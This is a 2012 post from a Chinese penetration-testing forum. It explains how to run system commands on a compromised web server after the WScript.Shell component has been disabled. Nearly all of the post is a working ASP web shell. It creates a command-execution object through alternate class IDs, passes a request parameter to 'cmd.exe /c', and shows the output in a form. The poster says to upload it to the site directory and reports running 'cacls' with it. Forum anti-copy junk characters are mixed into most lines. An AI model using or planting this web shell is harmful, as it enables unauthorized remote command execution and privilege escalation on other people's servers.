找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 wscript.shell删除解决办法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2026|回复: 0
打印 上一主题 下一主题

wscript.shell删除解决办法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:36:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
+ O* b7 z; f+ P+ X, r2 E* N( G7 y一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。% D& c# M5 b5 ?2 i- o
要想让运行命令可以试试这种方法,成功率为五五之数。
7 V5 w* G4 k: B6 n把下面代码复制:
. x- G. P9 H# E7 k<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
$ E( S* H) W7 ?. {<%if err then%>% m+ k+ Q( r8 ]1 T
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
/ H+ s/ h- ?5 F$ I0 r- u<%% g0 s& e6 A# v# G, y
end if
3 E: q. k1 f: @" s0 B/ _7 t. s; Yresponse.write("<textarea readonly cols=80 rows=20>")% I8 r4 [' g+ c
On Error Resume Next
. J8 |5 M! _6 C( [- d) `) Y$ Hresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
2 e6 b" V' W# p9 Y: ~response.write("</textarea>")
) Y6 [( Q  `( H) |9 |response.write("<form method='post'>")
) H/ P9 _5 W, F& w) d$ G; vresponse.write("<input type=text name='c' size=60><br>")
% h7 i; S7 t& D. z6 Yresponse.write("<input type=submit value='执行'></form>")
# f6 y& t$ k$ {%># S  T( ]) F7 T. n% C

! Y+ n' F3 J: I保存为一个asp文件,然后传到网站目录上去* D/ G/ V  b5 E1 r
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
2 e& v$ f4 Q( f5 \# B我用此成功运行过cacls命令。
8 j5 G2 g  N; D" l: f" k+ D0 S* L$ Y; U" X) Z+ `3 k
第二那就是运行时出错,可能限制某些代码执行
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表